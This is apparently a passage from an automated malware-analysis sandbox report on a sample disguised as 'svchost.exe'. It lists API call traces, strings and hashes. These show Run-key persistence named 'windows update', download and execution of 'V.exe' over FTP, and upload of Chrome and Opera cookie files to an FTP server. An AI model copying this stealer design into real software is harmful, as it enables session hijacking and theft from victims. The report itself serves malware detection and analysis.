      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00678FCC,00676378), ref: 00671B26
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90(?), ref: 00671B44
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671B55
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C), ref: 00671B66
      • fopen.MSVCR90 ref: 00671B6D
      • fgetc.MSVCR90 ref: 00671B75
      • fputc.MSVCR90 ref: 00671B85
      • fclose.MSVCR90 ref: 00671B94
      • fclose.MSVCR90 ref: 00671B97
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,00676378,?,?,?,?,?,?,?,00000000,?), ref: 00671BAB
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90 ref: 00671BC6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671BD7
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00671BE7
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671BF4
      • FtpPutFileA.WININET(00000000,00000000), ref: 00671C01
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671C11
      • DeleteFileA.KERNEL32(00000000), ref: 00671C18
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C2A
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C3C
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C51
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C66
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C7E
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$A?$basic_string@$??$?D@1@@std@@D@2@@0@V?$basic_string@$FileV01@V10@V10@0@Y?$basic_string@fclosefopen$DeleteV01@@fgetcfputc
      • String ID:
      • API String ID: 2590462752-0
      • Opcode ID: 59283b84cacd84a33509e9674f846ed068d6f13221058642eca7cd11a9fd7a5a
      • Instruction ID: 08a6242ae1a092690bbad59a854f3fb02a3386307765293434fc10cd7224d988
      • Opcode Fuzzy Hash: 59283b84cacd84a33509e9674f846ed068d6f13221058642eca7cd11a9fd7a5a
      • Instruction Fuzzy Hash: 2A517B31148780DFD328DB64DD49F9BBBAAFB84714F00890DF58E832A1EB746548CB62
      APIs
      • IsDebuggerPresent.KERNEL32 ref: 006751BD
      • _crt_debugger_hook.MSVCR90(00000001), ref: 006751CA
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006751D2
      • UnhandledExceptionFilter.KERNEL32(0067620C), ref: 006751DD
      • _crt_debugger_hook.MSVCR90(00000001), ref: 006751EE
      • GetCurrentProcess.KERNEL32(C0000409), ref: 006751F9
      • TerminateProcess.KERNEL32(00000000), ref: 00675200
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 3369434319-0
      • Opcode ID: 12093d4db6e5ca3b1cd2e90f19409943f5a1794227f82164144c2d27e3922ee2
      • Instruction ID: c7a2deec1faeedc234277d8880a0229162aee1e2878bf62fc199939ab2867668
      • Opcode Fuzzy Hash: 12093d4db6e5ca3b1cd2e90f19409943f5a1794227f82164144c2d27e3922ee2
      • Instruction Fuzzy Hash: C921FBB4991302CFC398DF24ED8DA443BA2BB19315F80606AE50D87360EBB45DCACF05

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 638 673790-6737fa memset 639 673993-673b4b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 6712b0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateDirectoryA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 6712b0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 6712b0 RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z RegSetValueExA RegCloseKey ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpGetFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA SetTimer ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 638->639 640 673800-67398e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 6712b0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 6712b0 RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z RegSetValueExA RegCloseKey ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpGetFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA SetTimer ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 638->640 649 673b4f-673b8c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 671480 call 674bfc 639->649 640->649
      APIs
      • memset.MSVCR90 ref: 006737EB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00673807
      • GetUserNameA.ADVAPI32(?), ref: 0067382D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\svchost.exe,?), ref: 00673849
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,?,?,?), ref: 00673873
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00673885
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s",00000000), ref: 0067389A
      • sprintf.MSVCR90 ref: 006738A1
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 006738C1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070,?,?,00000000,?,?,?), ref: 006738CD
      • RegSetValueExA.ADVAPI32(?,windows update,00000000,00000001,00000000,?,?,00000000,?,?,?), ref: 006738E2
      • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 006738ED
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000,?,?,?), ref: 006738FC
      • DeleteFileA.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00673903
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000,?,?,00000000,?,?,?), ref: 0067391A
      • FtpGetFileA.WININET(00000000,V.exe,00000000,?,?,00000000), ref: 0067392D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 00673954
      • CreateProcessA.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0067395B
      • SetTimer.USER32(?,000003E8,00002710,Function_00003780), ref: 00673971
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673981
      • sprintf.MSVCR90 ref: 00673856
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00671527,?,?, ), ref: 006712B7
        • Part of subcall function 006712B0: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?, ), ref: 006712CB
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?, ), ref: 006712D8
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 0067399A
      • GetUserNameA.ADVAPI32 ref: 006739C1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\VSA,?), ref: 006739DD
      • sprintf.MSVCR90 ref: 006739EA
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,?,?,?), ref: 006739FE
      • CreateDirectoryA.KERNEL32(00000000,?,?,?), ref: 00673A05
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\VSA\svchost.exe,?,?,?,?), ref: 00673A1C
      • sprintf.MSVCR90 ref: 00673A23
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00673A39
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00673A4B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s",00000000), ref: 00673A60
      • sprintf.MSVCR90 ref: 00673A67
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00673A87
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070,?,?,00000000), ref: 00673A93
      • RegSetValueExA.ADVAPI32(?,windows update,00000000,00000001,00000000,?,?,00000000), ref: 00673AA8
      • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00673AB3
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000), ref: 00673AC2
      • DeleteFileA.KERNEL32(00000000,?,?,00000000), ref: 00673AC9
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00673ADF
      • FtpGetFileA.WININET(00000000,V.exe,00000000,?,?,00000000), ref: 00673AF2
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673B5A
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C,AED9119B,6D4EE41E,?), ref: 006714BD
        • Part of subcall function 00671480: fopen.MSVCR90 ref: 006714C4
        • Part of subcall function 00671480: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006714DE
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 006714F5
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,nnumber=%d,FFFFFFFF), ref: 0067150C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671519
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?, ), ref: 0067153A
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 0067154E
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?, ), ref: 00671563
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload skype=%d,00000000,?,?, ), ref: 0067157C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671583
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671592
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006715AC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006715BC
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$sprintf$??0?$basic_string@$CreateFile$??1?$basic_string@??4?$basic_string@?erase@?$basic_string@CloseDeleteNameUserV01@V12@Value$DirectoryProcessTimerfopenfputcmemset
      • String ID: $ $"%s"$C:\Users\%s\AppData\Local\windows update\VSA$C:\Users\%s\AppData\Local\windows update\VSA\svchost.exe$C:\Users\%s\AppData\Local\windows update\svchost.exe$Software\Microsoft\Windows\CurrentVersion\Run$V.exe$windows update
      • API String ID: 737356961-1717693500
      • Opcode ID: 04cc06f7345ffc3fde89c1ee140ffc8fd44b3c3e8f4d16bfa307c47a2a575f60
      • Instruction ID: c7a64852d743fabb97921809b6aecd963c5db9713203c755c92d25fa0e28789a
      • Opcode Fuzzy Hash: 04cc06f7345ffc3fde89c1ee140ffc8fd44b3c3e8f4d16bfa307c47a2a575f60
      • Instruction Fuzzy Hash: BBA19D71254741EFD328DB60DD59F9A77AABB88B01F00890CF64ED71E0DBB16588CB62
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(Upload cookie,?,?,?,AED9119B), ref: 00672238
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 0067224F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF), ref: 00672271
      • sprintf.MSVCR90 ref: 00672278
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 0067228E
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 006722A2
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\cookies), ref: 006722AD
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006722B9
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 006722C7
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP90(?,C:\Users\,00678FE8), ref: 006722DE
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?), ref: 006722FC
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067230D
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(cookies), ref: 0067231F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,00000000,\AppData\Local\Google\Chrome\User Data\Default), ref: 0067233F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 0067235E
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 0067237D
        • Part of subcall function 00671A80: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 00671ACC
        • Part of subcall function 00671A80: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00671AE1
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C), ref: 00671AF5
        • Part of subcall function 00671A80: fopen.MSVCR90 ref: 00671B02
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00678FCC,00676378), ref: 00671B26
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90(?), ref: 00671B44
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671B55
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C), ref: 00671B66
        • Part of subcall function 00671A80: fopen.MSVCR90 ref: 00671B6D
        • Part of subcall function 00671A80: fgetc.MSVCR90 ref: 00671B75
        • Part of subcall function 00671A80: fputc.MSVCR90 ref: 00671B85
        • Part of subcall function 00671A80: fclose.MSVCR90 ref: 00671B94
        • Part of subcall function 00671A80: fclose.MSVCR90 ref: 00671B97
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,00676378,?,?,?,?,?,?,?,00000000,?), ref: 00671BAB
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90 ref: 00671BC6
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671BD7
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00671BE7
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP90(?,C:\Users\,00678FE8), ref: 0067239E
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90 ref: 006723B6
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 006723CB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006723DD
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006723EE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(Cookies4.dat), ref: 00672400
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?,?,?,?,?,?,?,00000000,?,00000000,\AppData\Roaming\Opera\Opera), ref: 00672417
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672436
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672455
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671BF4
        • Part of subcall function 00671A80: FtpPutFileA.WININET(00000000,00000000), ref: 00671C01
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671C11
        • Part of subcall function 00671A80: DeleteFileA.KERNEL32(00000000), ref: 00671C18
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C2A
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C3C
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C51
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C66
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C7E
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672480
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672495
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006724AA
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$A?$basic_string@$??0?$basic_string@V01@@$??$?D@1@@std@@D@2@@0@V?$basic_string@$V01@$Y?$basic_string@$V10@$??4?$basic_string@?erase@?$basic_string@CreateDirectoryFileV10@0@V10@@V12@fclosefopen$DeleteMessageSendfgetcfputcsprintf
      • String ID: $C:\Users\$Cookies4.dat$Upload cookie$\AppData\Local\Google\Chrome\User Data\Default$\AppData\Roaming\Opera\Opera$\cookies$cookies$v_%d
      • API String ID: 1240453502-1134763947
      • Opcode ID: 514c89e83fddfd9e57dfc9de9c01a68f5d47c5355612c2cc2bc2b1ab77a5a46a
      • Instruction ID: 328b1c339035c835c95fb49a1f7760835a866c91ac5873f00eacbb3360fa61a8
      • Opcode Fuzzy Hash: 514c89e83fddfd9e57dfc9de9c01a68f5d47c5355612c2cc2bc2b1ab77a5a46a
      • Instruction Fuzzy Hash: 3A716B705087809FD328EB78D959B9EBBE6BB94704F04890DF58E83291DB746548CFA3
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006733A6
